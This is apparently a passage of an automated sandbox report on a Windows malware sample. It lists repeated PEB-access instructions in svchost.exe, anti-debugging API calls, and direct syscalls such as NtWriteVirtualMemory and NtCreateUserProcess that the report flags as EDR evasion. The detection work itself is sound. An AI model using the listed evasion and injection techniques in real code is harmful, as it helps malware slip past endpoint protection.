            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A430 mov eax, dword ptr fs:[00000030h]2_2_03A6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC460 mov ecx, dword ptr fs:[00000030h]2_2_03ABC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA456 mov eax, dword ptr fs:[00000030h]2_2_03AEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2645D mov eax, dword ptr fs:[00000030h]2_2_03A2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5245A mov eax, dword ptr fs:[00000030h]2_2_03A5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EBFC mov eax, dword ptr fs:[00000030h]2_2_03A5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]2_2_03ABCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]2_2_03ADEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04B00 mov eax, dword ptr fs:[00000030h]2_2_03B04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]2_2_03A2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB40 mov eax, dword ptr fs:[00000030h]2_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]2_2_03AD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28B50 mov eax, dword ptr fs:[00000030h]2_2_03A28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEB50 mov eax, dword ptr fs:[00000030h]2_2_03ADEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]2_2_03A86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]2_2_03B04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]2_2_03A68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]2_2_03A30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]2_2_03A6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]2_2_03A5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]2_2_03A6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]2_2_03ABCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEA60 mov eax, dword ptr fs:[00000030h]2_2_03ADEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]2_2_03A40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]2_2_03A40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]2_2_03A309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]2_2_03A309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]2_2_03AB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]2_2_03AB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]2_2_03AB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]2_2_03ABE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]2_2_03A629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]2_2_03A629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]2_2_03AC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]2_2_03A649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03AFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]2_2_03AB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]2_2_03AC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]2_2_03AAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]2_2_03AAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]2_2_03ABC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]2_2_03A28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]2_2_03A28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]2_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]2_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]2_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]2_2_03AD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]2_2_03AD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]2_2_03ABC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]2_2_03AB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04940 mov eax, dword ptr fs:[00000030h]2_2_03B04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]2_2_03A30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]2_2_03ABC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03AFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03A5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B008C0 mov eax, dword ptr fs:[00000030h]2_2_03B008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h]2_2_03A52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
